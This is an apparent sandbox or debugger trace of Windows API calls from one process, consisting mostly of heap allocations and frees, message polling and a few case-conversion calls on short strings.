1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.412] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0264.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0264.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.414] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.415] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0264.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.417] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0264.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0264.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0264.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0264.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.421] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0264.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a20d0 [0264.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x34a2060 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.424] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0264.425] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.426] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.426] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.427] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 